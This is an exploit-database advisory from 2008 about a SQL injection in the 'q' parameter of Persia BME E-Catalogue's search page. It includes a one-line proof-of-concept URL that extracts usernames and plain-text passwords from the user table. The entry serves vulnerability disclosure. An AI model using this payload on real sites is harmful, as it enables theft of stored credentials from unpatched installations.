Persia BME E-Catalogue Remote SQL Injection Vulnerability

2008-10-27T00:00:00
ID 1337DAY-ID-3959
Type zdt
Reporter 0day Today Team
Modified 2008-10-27T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =========================================================
Persia BME E-Catalogue Remote SQL Injection Vulnerability
=========================================================



1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1



###################################################################################
#		AmnPardaz Security Research Team
#
# Title:  Persia BME E-Catalogue SQL Injection Vulnerability
# Vendor: www.persiabme.com
# Impact: High
# Fix: N/A
###################################################################################

####################
1. Description:
####################
	Persia BME E-Catalogue is a powerful engine which provides webmasters with advanced abilities of controlling their website. The system has a free style multi level Menu to add a company's products or services.
	
####################
2. Vulnerability:
####################
	Input passed to the "q" parameter in "search.aspx" is not properly sanitised before being used in SQL queries.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.Its possible to obtain user's plain text password by this vulnerability.
			
####################
3. Exploits/POCs:
####################
	http://[URL]/search.asp?action=search&q=BugReport.ir' or 1=(select top 1 username+':'+password from tbluser)--
	
####################
4. Solution:
####################
	Edit the source code to ensure that inputs are properly sanitized.
	
####################




#  0day.today [2018-01-01]  #